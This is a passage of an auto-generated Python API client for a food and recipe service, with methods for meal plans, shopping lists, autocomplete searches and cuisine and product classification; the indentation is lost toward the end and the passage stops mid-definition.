    Add an item to the user's meal plan.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.add_to_meal_plan(username, hash, inline_object11, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str username: The username. (required)
    :param str hash: The private hash for the username. (required)
    :param InlineObject11 inline_object11: (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # With _return_http_data_only forced on, the delegate returns either the
    # request thread (async_req) or the response data directly — in both
    # cases its return value is exactly what this wrapper must return.
    return self.add_to_meal_plan_with_http_info(username, hash, inline_object11, **kwargs)  # noqa: E501
def add_to_meal_plan_with_http_info(self, username, hash, inline_object11, **kwargs):  # noqa: E501
    """Add to Meal Plan  # noqa: E501

    Add an item to the user's meal plan.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.add_to_meal_plan_with_http_info(username, hash, inline_object11, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str username: The username. (required)
    :param str hash: The private hash for the username. (required)
    :param InlineObject11 inline_object11: (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """

    # Snapshot of the call's arguments; locals() captures username/hash/
    # inline_object11 plus the kwargs dict, so it must be taken before any
    # other local variable is created.
    local_var_params = locals()

    all_params = ['username', 'hash', 'inline_object11']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown keyword arguments, then flatten kwargs into the
    # snapshot so all parameters are looked up uniformly below.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_to_meal_plan" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'username' is set
    if ('username' not in local_var_params or
            local_var_params['username'] is None):
        raise ApiValueError("Missing the required parameter `username` when calling `add_to_meal_plan`")  # noqa: E501
    # verify the required parameter 'hash' is set
    if ('hash' not in local_var_params or
            local_var_params['hash'] is None):
        raise ApiValueError("Missing the required parameter `hash` when calling `add_to_meal_plan`")  # noqa: E501
    # verify the required parameter 'inline_object11' is set
    if ('inline_object11' not in local_var_params or
            local_var_params['inline_object11'] is None):
        raise ApiValueError("Missing the required parameter `inline_object11` when calling `add_to_meal_plan`")  # noqa: E501

    collection_formats = {}

    # 'username' is substituted into the URL path; 'hash' travels as a
    # query parameter; the InlineObject11 payload becomes the request body.
    path_params = {}
    if 'username' in local_var_params:
        path_params['username'] = local_var_params['username']  # noqa: E501

    query_params = []
    if 'hash' in local_var_params:
        query_params.append(('hash', local_var_params['hash']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    if 'inline_object11' in local_var_params:
        body_params = local_var_params['inline_object11']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        [''])  # noqa: E501

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    # Delegate the actual HTTP POST (and async handling) to ApiClient.
    return self.api_client.call_api(
        '/mealplanner/{username}/items', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def add_to_shopping_list(self, username, hash, inline_object14, **kwargs):  # noqa: E501
    """Add to Shopping List  # noqa: E501

    Add an item to the current shopping list of a user.
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response data.

    >>> thread = api.add_to_shopping_list(username, hash, inline_object14, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str username: The username. (required)
    :param str hash: The private hash for the username. (required)
    :param InlineObject14 inline_object14: (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always yields just the response payload;
    # callers wanting status code and headers use the *_with_http_info form.
    kwargs['_return_http_data_only'] = True
    return self.add_to_shopping_list_with_http_info(username, hash, inline_object14, **kwargs)  # noqa: E501
def add_to_shopping_list_with_http_info(self, username, hash, inline_object14, **kwargs):  # noqa: E501
    """Add to Shopping List  # noqa: E501

    Add an item to the current shopping list of a user.
    Synchronous by default; pass async_req=True for an asynchronous call.

    >>> thread = api.add_to_shopping_list_with_http_info(username, hash, inline_object14, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str username: The username. (required)
    :param str hash: The private hash for the username. (required)
    :param InlineObject14 inline_object14: (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Must stay the first statement so locals() snapshots the call arguments.
    local_var_params = locals()

    all_params = [
        'username', 'hash', 'inline_object14',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]

    # Reject unknown keyword arguments, then fold the known ones in.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_to_shopping_list" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    # All three parameters are mandatory for this endpoint.
    if local_var_params.get('username') is None:
        raise ApiValueError("Missing the required parameter `username` when calling `add_to_shopping_list`")  # noqa: E501
    if local_var_params.get('hash') is None:
        raise ApiValueError("Missing the required parameter `hash` when calling `add_to_shopping_list`")  # noqa: E501
    if local_var_params.get('inline_object14') is None:
        raise ApiValueError("Missing the required parameter `inline_object14` when calling `add_to_shopping_list`")  # noqa: E501

    collection_formats = {}

    # `username` goes into the URL path; `hash` into the query string.
    path_params = {'username': local_var_params['username']}
    query_params = [('hash', local_var_params['hash'])]

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(
            ['']),  # noqa: E501
    }

    form_params = []
    local_var_files = {}

    # The request body is the serialized InlineObject14.
    body_params = local_var_params['inline_object14']

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/mealplanner/{username}/shopping-list/items', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def analyze_a_recipe_search_query(self, q, **kwargs):  # noqa: E501
    """Analyze a Recipe Search Query  # noqa: E501

    Parse a recipe search query to find out its intention.
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response data.

    >>> thread = api.analyze_a_recipe_search_query(q, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str q: The recipe search query. (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always yields just the response payload;
    # callers wanting status code and headers use the *_with_http_info form.
    kwargs['_return_http_data_only'] = True
    return self.analyze_a_recipe_search_query_with_http_info(q, **kwargs)  # noqa: E501
def analyze_a_recipe_search_query_with_http_info(self, q, **kwargs):  # noqa: E501
    """Analyze a Recipe Search Query  # noqa: E501

    Parse a recipe search query to find out its intention.
    Synchronous by default; pass async_req=True for an asynchronous call.

    >>> thread = api.analyze_a_recipe_search_query_with_http_info(q, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str q: The recipe search query. (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Must stay the first statement so locals() snapshots the call arguments.
    local_var_params = locals()

    all_params = [
        'q',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]

    # Reject unknown keyword arguments, then fold the known ones in.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method analyze_a_recipe_search_query" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    if local_var_params.get('q') is None:
        raise ApiValueError("Missing the required parameter `q` when calling `analyze_a_recipe_search_query`")  # noqa: E501

    collection_formats = {}
    path_params = {}

    # The search query travels as a single query-string parameter.
    query_params = [('q', local_var_params['q'])]

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/recipes/queries/analyze', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def analyze_recipe_instructions(self, instructions, **kwargs):  # noqa: E501
    """Analyze Recipe Instructions  # noqa: E501

    This endpoint allows you to break down instructions into atomic steps.
    Furthermore, each step will contain the ingredients and equipment
    required. Additionally, all ingredients and equipment from the recipe's
    instructions will be extracted independently of the step they're used in.
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response data.

    >>> thread = api.analyze_recipe_instructions(instructions, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str instructions: The instructions to be analyzed. (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always yields just the response payload;
    # callers wanting status code and headers use the *_with_http_info form.
    kwargs['_return_http_data_only'] = True
    return self.analyze_recipe_instructions_with_http_info(instructions, **kwargs)  # noqa: E501
def analyze_recipe_instructions_with_http_info(self, instructions, **kwargs):  # noqa: E501
    """Analyze Recipe Instructions  # noqa: E501

    This endpoint allows you to break down instructions into atomic steps.
    Furthermore, each step will contain the ingredients and equipment
    required. Additionally, all ingredients and equipment from the recipe's
    instructions will be extracted independently of the step they're used in.
    Synchronous by default; pass async_req=True for an asynchronous call.

    >>> thread = api.analyze_recipe_instructions_with_http_info(instructions, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str instructions: The instructions to be analyzed. (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Must stay the first statement so locals() snapshots the call arguments.
    local_var_params = locals()

    all_params = [
        'instructions',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]

    # Reject unknown keyword arguments, then fold the known ones in.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method analyze_recipe_instructions" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    if local_var_params.get('instructions') is None:
        raise ApiValueError("Missing the required parameter `instructions` when calling `analyze_recipe_instructions`")  # noqa: E501

    collection_formats = {}
    path_params = {}
    query_params = []

    # The payload is posted as a url-encoded form field, not a JSON body.
    form_params = [('instructions', local_var_params['instructions'])]
    local_var_files = {}
    body_params = None

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(
            ['application/x-www-form-urlencoded']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/recipes/analyzeInstructions', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def autocomplete_ingredient_search(self, query, **kwargs):  # noqa: E501
    """Autocomplete Ingredient Search  # noqa: E501

    Autocomplete the entry of an ingredient.
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response data.

    >>> thread = api.autocomplete_ingredient_search(query, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str query: The partial or full ingredient name. (required)
    :param float number: The number of results to return (between 1 and 100).
    :param bool meta_information: Whether to return more meta information about the ingredients.
    :param str intolerances: A comma-separated list of intolerances. All recipes returned must not contain ingredients that are not suitable for people with the intolerances entered. See a full list of supported intolerances.
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always yields just the response payload;
    # callers wanting status code and headers use the *_with_http_info form.
    kwargs['_return_http_data_only'] = True
    return self.autocomplete_ingredient_search_with_http_info(query, **kwargs)  # noqa: E501
def autocomplete_ingredient_search_with_http_info(self, query, **kwargs):  # noqa: E501
    """Autocomplete Ingredient Search  # noqa: E501

    Autocomplete the entry of an ingredient.
    Synchronous by default; pass async_req=True for an asynchronous call.

    >>> thread = api.autocomplete_ingredient_search_with_http_info(query, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str query: The partial or full ingredient name. (required)
    :param float number: The number of results to return (between 1 and 100).
    :param bool meta_information: Whether to return more meta information about the ingredients.
    :param str intolerances: A comma-separated list of intolerances. All recipes returned must not contain ingredients that are not suitable for people with the intolerances entered. See a full list of supported intolerances.
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Must stay the first statement so locals() snapshots the call arguments.
    local_var_params = locals()

    all_params = [
        'query', 'number', 'meta_information', 'intolerances',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]

    # Reject unknown keyword arguments, then fold the known ones in.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method autocomplete_ingredient_search" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    if local_var_params.get('query') is None:
        raise ApiValueError("Missing the required parameter `query` when calling `autocomplete_ingredient_search`")  # noqa: E501

    collection_formats = {}
    path_params = {}

    # `query` is always present; the rest are only sent if supplied.
    query_params = [('query', local_var_params['query'])]
    if 'number' in local_var_params:
        query_params.append(('number', local_var_params['number']))  # noqa: E501
    if 'meta_information' in local_var_params:
        query_params.append(('metaInformation', local_var_params['meta_information']))  # noqa: E501
    if 'intolerances' in local_var_params:
        query_params.append(('intolerances', local_var_params['intolerances']))  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/food/ingredients/autocomplete', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def autocomplete_menu_item_search(self, query, **kwargs):  # noqa: E501
    """Autocomplete Menu Item Search  # noqa: E501

    Generate suggestions for menu items based on a (partial) query.
    The matches will be found by looking in the title only.
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response data.

    >>> thread = api.autocomplete_menu_item_search(query, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str query: The (partial) search query. (required)
    :param float number: The number of results to return (between 1 and 25).
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always yields just the response payload;
    # callers wanting status code and headers use the *_with_http_info form.
    kwargs['_return_http_data_only'] = True
    return self.autocomplete_menu_item_search_with_http_info(query, **kwargs)  # noqa: E501
def autocomplete_menu_item_search_with_http_info(self, query, **kwargs):  # noqa: E501
    """Autocomplete Menu Item Search  # noqa: E501

    Generate suggestions for menu items based on a (partial) query.
    The matches will be found by looking in the title only.
    Synchronous by default; pass async_req=True for an asynchronous call.

    >>> thread = api.autocomplete_menu_item_search_with_http_info(query, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str query: The (partial) search query. (required)
    :param float number: The number of results to return (between 1 and 25).
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Must stay the first statement so locals() snapshots the call arguments.
    local_var_params = locals()

    all_params = [
        'query', 'number',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]

    # Reject unknown keyword arguments, then fold the known ones in.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method autocomplete_menu_item_search" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    if local_var_params.get('query') is None:
        raise ApiValueError("Missing the required parameter `query` when calling `autocomplete_menu_item_search`")  # noqa: E501

    collection_formats = {}
    path_params = {}

    # `query` is always present; `number` only if the caller supplied it.
    query_params = [('query', local_var_params['query'])]
    if 'number' in local_var_params:
        query_params.append(('number', local_var_params['number']))  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/food/menuItems/suggest', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def autocomplete_product_search(self, query, **kwargs):  # noqa: E501
    """Autocomplete Product Search  # noqa: E501

    Generate suggestions for grocery products based on a (partial) query.
    The matches will be found by looking in the title only.
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response data.

    >>> thread = api.autocomplete_product_search(query, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str query: The (partial) search query. (required)
    :param float number: The number of results to return (between 1 and 25).
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always yields just the response payload;
    # callers wanting status code and headers use the *_with_http_info form.
    kwargs['_return_http_data_only'] = True
    return self.autocomplete_product_search_with_http_info(query, **kwargs)  # noqa: E501
def autocomplete_product_search_with_http_info(self, query, **kwargs):  # noqa: E501
    """Autocomplete Product Search  # noqa: E501

    Generate suggestions for grocery products based on a (partial) query.
    The matches will be found by looking in the title only.
    Synchronous by default; pass async_req=True for an asynchronous call.

    >>> thread = api.autocomplete_product_search_with_http_info(query, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str query: The (partial) search query. (required)
    :param float number: The number of results to return (between 1 and 25).
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Must stay the first statement so locals() snapshots the call arguments.
    local_var_params = locals()

    all_params = [
        'query', 'number',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]

    # Reject unknown keyword arguments, then fold the known ones in.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method autocomplete_product_search" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    if local_var_params.get('query') is None:
        raise ApiValueError("Missing the required parameter `query` when calling `autocomplete_product_search`")  # noqa: E501

    collection_formats = {}
    path_params = {}

    # `query` is always present; `number` only if the caller supplied it.
    query_params = [('query', local_var_params['query'])]
    if 'number' in local_var_params:
        query_params.append(('number', local_var_params['number']))  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/food/products/suggest', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def autocomplete_recipe_search(self, query, **kwargs):  # noqa: E501
    """Autocomplete Recipe Search  # noqa: E501

    Autocomplete a partial input to suggest possible recipe names.
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response data.

    >>> thread = api.autocomplete_recipe_search(query, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str query: The query to be autocompleted. (required)
    :param float number: The number of results to return (between 1 and 25).
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always yields just the response payload;
    # callers wanting status code and headers use the *_with_http_info form.
    kwargs['_return_http_data_only'] = True
    return self.autocomplete_recipe_search_with_http_info(query, **kwargs)  # noqa: E501
def autocomplete_recipe_search_with_http_info(self, query, **kwargs):  # noqa: E501
    """Autocomplete Recipe Search  # noqa: E501

    Autocomplete a partial input to suggest possible recipe names.
    Synchronous by default; pass async_req=True for an asynchronous call.

    >>> thread = api.autocomplete_recipe_search_with_http_info(query, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str query: The query to be autocompleted. (required)
    :param float number: The number of results to return (between 1 and 25).
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Must stay the first statement so locals() snapshots the call arguments.
    local_var_params = locals()

    all_params = [
        'query', 'number',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]

    # Reject unknown keyword arguments, then fold the known ones in.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method autocomplete_recipe_search" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    if local_var_params.get('query') is None:
        raise ApiValueError("Missing the required parameter `query` when calling `autocomplete_recipe_search`")  # noqa: E501

    collection_formats = {}
    path_params = {}

    # `query` is always present; `number` only if the caller supplied it.
    query_params = [('query', local_var_params['query'])]
    if 'number' in local_var_params:
        query_params.append(('number', local_var_params['number']))  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/recipes/autocomplete', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def classify_cuisine(self, title, ingredient_list, **kwargs):  # noqa: E501
    """Classify Cuisine  # noqa: E501

    Classify the recipe's cuisine.
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response data.

    >>> thread = api.classify_cuisine(title, ingredient_list, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str title: The title of the recipe. (required)
    :param str ingredient_list: The ingredient list of the recipe, one ingredient per line (separate lines with \\\\n). (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always yields just the response payload;
    # callers wanting status code and headers use the *_with_http_info form.
    kwargs['_return_http_data_only'] = True
    return self.classify_cuisine_with_http_info(title, ingredient_list, **kwargs)  # noqa: E501
def classify_cuisine_with_http_info(self, title, ingredient_list, **kwargs):  # noqa: E501
    """Classify Cuisine  # noqa: E501

    Classify the recipe's cuisine.
    Synchronous by default; pass async_req=True for an asynchronous call.

    >>> thread = api.classify_cuisine_with_http_info(title, ingredient_list, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str title: The title of the recipe. (required)
    :param str ingredient_list: The ingredient list of the recipe, one ingredient per line (separate lines with \\\\n). (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Must stay the first statement so locals() snapshots the call arguments.
    local_var_params = locals()

    all_params = [
        'title', 'ingredient_list',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]

    # Reject unknown keyword arguments, then fold the known ones in.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method classify_cuisine" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    # Both parameters are mandatory for this endpoint.
    if local_var_params.get('title') is None:
        raise ApiValueError("Missing the required parameter `title` when calling `classify_cuisine`")  # noqa: E501
    if local_var_params.get('ingredient_list') is None:
        raise ApiValueError("Missing the required parameter `ingredient_list` when calling `classify_cuisine`")  # noqa: E501

    collection_formats = {}
    path_params = {}
    query_params = []

    # The payload is posted as url-encoded form fields; note the camelCase
    # wire name `ingredientList` for the snake_case parameter.
    form_params = [
        ('title', local_var_params['title']),  # noqa: E501
        ('ingredientList', local_var_params['ingredient_list']),  # noqa: E501
    ]
    local_var_files = {}
    body_params = None

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(
            ['application/x-www-form-urlencoded']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/recipes/cuisine', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def classify_grocery_product(self, inline_object9, **kwargs):  # noqa: E501
    """Classify Grocery Product  # noqa: E501

    This endpoint allows you to match a packaged food to a basic category,
    e.g. a specific brand of milk to the category milk.
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response data.

    >>> thread = api.classify_grocery_product(inline_object9, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param InlineObject9 inline_object9: (required)
    :param str locale: The display name of the returned category, supported is en_US (for American English) and en_GB (for British English).
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always yields just the response payload;
    # callers wanting status code and headers use the *_with_http_info form.
    kwargs['_return_http_data_only'] = True
    return self.classify_grocery_product_with_http_info(inline_object9, **kwargs)  # noqa: E501
def classify_grocery_product_with_http_info(self, inline_object9, **kwargs): # noqa: E501
"""Classify Grocery Product # noqa: E501
This endpoint allows you to match a packaged food to a basic category, e.g. a specific brand of milk to the category milk. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.classify_grocery_product_with_http_info(inline_object9, async_req=True)
>>> result = thread.get()
:param async_req bool
:param InlineObject9 inline_object9: (required)
:param str locale: The display name of the returned category, supported is en_US (for American English) and en_GB (for British English).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['inline_object9', 'locale'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method classify_grocery_product" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'inline_object9' is set
if ('inline_object9' not in local_var_params or
local_var_params['inline_object9'] is None):
raise ApiValueError("Missing the required parameter `inline_object9` when calling `classify_grocery_product`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'locale' in local_var_params:
query_params.append(('locale', local_var_params['locale'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'inline_object9' in local_var_params:
body_params = local_var_params['inline_object9']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/products/classify', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def classify_grocery_product_bulk(self, request_body, **kwargs): # noqa: E501
"""Classify Grocery Product Bulk # noqa: E501
Provide a set of product jsons, get back classified products. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.classify_grocery_product_bulk(request_body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[object] request_body: (required)
:param str locale: The display name of the returned category, supported is en_US (for American English) and en_GB (for British English).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.classify_grocery_product_bulk_with_http_info(request_body, **kwargs) # noqa: E501
else:
(data) = self.classify_grocery_product_bulk_with_http_info(request_body, **kwargs) # noqa: E501
return data
def classify_grocery_product_bulk_with_http_info(self, request_body, **kwargs): # noqa: E501
